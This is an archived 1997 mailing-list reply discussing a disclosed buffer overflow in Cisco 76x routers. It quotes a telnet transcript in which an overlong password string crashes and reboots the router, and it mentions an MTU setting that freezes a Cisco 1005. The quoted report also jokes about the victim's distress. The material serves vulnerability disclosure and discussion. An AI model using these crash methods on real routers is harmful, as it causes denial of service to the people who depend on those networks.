Re: cisco 76x buffer overflow
ralf UNI-KOBLENZ.DE
Thu, 11 Dec 1997 09:19:09 +0100
- Next message: John Bashinski: "Re: cisco 76x buffer overflow"
- Previous message: Laslo Orto: "cisco 76x buffer overflow"
- In reply to: Laslo Orto: "cisco 76x buffer overflow"
- Next in thread: John Bashinski: "Re: cisco 76x buffer overflow"
On Thu, Dec 11, 1997 at 01:11:13AM -0500, Laslo Orto wrote:

> I don't know of anybody ever posting anything on this subject, so I'll go
> ahead. I found a buffer overflow in the Cisco 76x
> series router. The bug exists only in the 4 users limit software, I couldn't
> reproduce it with the unlimited version.
> When I reported the bug to Cisco I promised them that I'll post this info to
> public if they don't fix it within a week.
> It was over a month ago, and I was never notified of any fix so I'm assuming
> they didn't make any fix. I also can't find any
> mentioning of this bug on their web site by searching for the bug id.
> The exploit is pretty simple:
> telnet cisco762.domain.com
> Trying 1.2.3.4...
> Connected to 1.2.3.4.
> Escape character is '^]'.
> Enter Password:Enter a
> veryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
> yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
> yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
> yyyyyyyyyyyyyyyyyyyyyyyyyyyy long string here
> and watch the pretty lights go on as the Cisco reboots, or imagine your
> victim tearing his hair out.

IOS has probably a pound more of them. While not exploitable from outside I can crash my CISCO 1005 running IOS 10.3(8) by setting the MTU to 15kb. A couple of seconds later the box will freeze. Just to show how tested the thing is ...

IOS is probably not as badly affected as other operating systems because few people outside of CISCO have the required knowledge about the OS internals, so writing a useable exploit is hard.

Ralf